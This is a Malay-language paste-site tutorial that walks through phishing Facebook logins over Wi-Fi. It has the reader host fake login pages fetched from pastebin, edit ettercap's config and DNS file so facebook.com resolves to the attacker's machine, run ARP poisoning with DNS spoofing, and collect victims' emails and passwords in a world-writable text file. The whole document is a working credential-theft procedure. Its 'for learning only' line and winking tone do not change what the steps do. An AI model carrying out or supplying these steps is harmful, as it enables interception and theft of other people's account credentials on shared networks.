get paid to paste

Tutorial phishing facebook dlm wifi dengan...

########################################################

#   Tutorial phishing wifi dengan teknik DNS spoofing                                  #

#                                                                                                                              #

# Tested di OS ubuntu 11.04 Natty Narwhal by Shah Linux                         #

########################################################

 

Peralatan yang perlu disediakan ialah:-

 

1. Install apache server ( shah@ubuntu:~$sudo apt-get install apache2 )

 

2. Install php (  shah@ubuntu:~$sudo apt-get install php5 )

 

3. Install ettercap ( shah@ubuntu:~$sudo apt-get install ettercap )

 

4. Script phishing facebook boleh ambil di sini index.php ( http://pastebin.com/zMXSZEYN ) dan login.php ( http://pastebin.com/ZkhZJuBW )

 

5. Sekiranya apache server dan php dah di install, buka browser mozilla anda dan taip http://localhost .

 

6. Kalau keluar "Its work" itu tandanya apache dan php anda siap untuk di inject dgn file2 phishing :P.

 

7. Pindahkan file index.php dan login.php tadi ke dlm server apache dlm localhost kita. ;]  

 

8. Pastikan file index.php dan login.php berada dlm /var/www/ atau bleh check root@ubuntu:~$cd /var/www/ dan taip ls ;]

 

9. Sekarang kita kena configure ettercap yg kita install td

 

10. Taip dlm terminal: shah@ubuntu:~$gedit /etc/etter.conf  

 

11. Cari dan ubah dari:-  

 

#---------------

#     Linux  

#---------------

 

# if you use ipchains:

   #redir_command_on = "ipchains -A input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport"

   #redir_command_off = "ipchains -D input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport"

 

# if you use iptables:

   #redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

   #redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

 

  Buang tanda "#" menjadi:-  

 

#---------------

#     Linux  

#---------------

 

# if you use ipchains:

   redir_command_on = "ipchains -A input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport"

   redir_command_off = "ipchains -D input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport"

 

# if you use iptables:

   redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

   redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"  

 

12. Buang tanda "#" sebagai mengaktifkan script

 

13. Edit file etter.dns atau melalui terminal:  root@ubuntu:~#gedit /usr/share/ettercap/etter.dns  

 

   Tambah:-  

 

########################start#################################################

facebook.com      A   192.168.1.100

*.facebook.com    A   192.168.1.100

www.facebook.com  PTR 192.168.1.100   # Wildcards in PTR are not allowed

#########################end##########################################

 

 

facebook.com

192.168.1.100

 

14. Save etter.dns tadi yg telah kita edit. ;]

 

15. Lihat semula di dlm folder /var/www/ dan tambah file pass.txt.  

 

16. Caranya taip "gedit pass.txt" dan save.

 

17. Execute file pass.txt dgn cmd:

 

    root@ubuntu:/var/www#touch pass.txt

    root@ubuntu:/var/www#chmod 777 pass.txt

 

18. Buka dan setting ettercap > "sniff" pilih unified sniffing dan pilih wlan0/eth0 > plugins pilih manage the plugins > Klik autoadd dan dns_spoof > pergi kat Hosts dan scan for hosts > klik host lists > add target 1 and target 2 dan target seterusnya > pergi ke Mitm klik Arp poisoning dan select sniff remote connections > pergi ke start dan start sniffing ;]

 

19. root@ubuntu:~#sudo nano /proc/sys/net/ipv4/ip_forward

 

     Ubah angka 0 kpd angka 1 dan save (CTRLX+yes+enter)

 

20. Boleh test dengan taip kat browser http://localhost dan anda akan nampak page facebook phishing td :P contoh: http://img.rc.my/X/localhost.png

 

21. Cuba login email dan password...email dan pass anda masukkan tadi boleh lihat di dalam http://localhost/pass.txt  contoh: http://img.rc.my/X/phishing.png   ;]

 

22. Ini hanyalah utk pembelajaran sahaja dan saya tidak bertanggungjwb diatas  apa yang akan anda lakukan :P

 

      ./sharing is caring

Pasted: Jan 30, 2012, 11:58:45 pm
Views: 136